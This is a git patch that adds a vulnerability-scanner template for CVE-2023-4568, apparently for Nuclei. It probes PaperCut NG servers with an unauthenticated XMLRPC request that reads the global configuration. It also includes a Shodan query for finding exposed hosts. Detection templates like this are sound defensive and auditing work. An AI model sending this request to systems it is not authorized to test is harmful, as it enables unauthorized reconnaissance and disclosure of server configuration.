From 681a1b3263820f54caeb4fb11f97f5eae9ede0ef Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 18 Sep 2023 23:06:47 +0530 Subject: [PATCH] Create CVE-2023-4568.yaml --- http/cves/2023/CVE-2023-4568.yaml | 53 +++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 http/cves/2023/CVE-2023-4568.yaml diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml new file mode 100644 index 00000000000..bd01f96b1ee --- /dev/null +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -0,0 +1,53 @@ +id: CVE-2023-4568 + +info: + name: PaperCut NG Unauthenticated XMLRPC Functionality + author: DhiyaneshDK + severity: medium + description: | + PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-4568 + - https://www.tenable.com/security/research/tra-2023-31 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2023-4568 + cwe-id: CWE-287 + epss-score: 0.00046 + epss-percentile: 0.14237 + cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: papercut + product: papercut_ng + shodan-query: html:"content="PaperCut"" + tags: cve,cve2023,unauth,papercut + +http: + - raw: + - | + POST /rpc/clients/xmlrpc HTTP/1.1 + Host: {{Hostname}} + Content-Type:text/xml + + client.getGlobalConfigstr1str2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'conf.ssl-port' + - 'conf.auth-ttl-default' + condition: and + + - type: word + part: header + words: + - text/xml + + - type: status + status: + - 200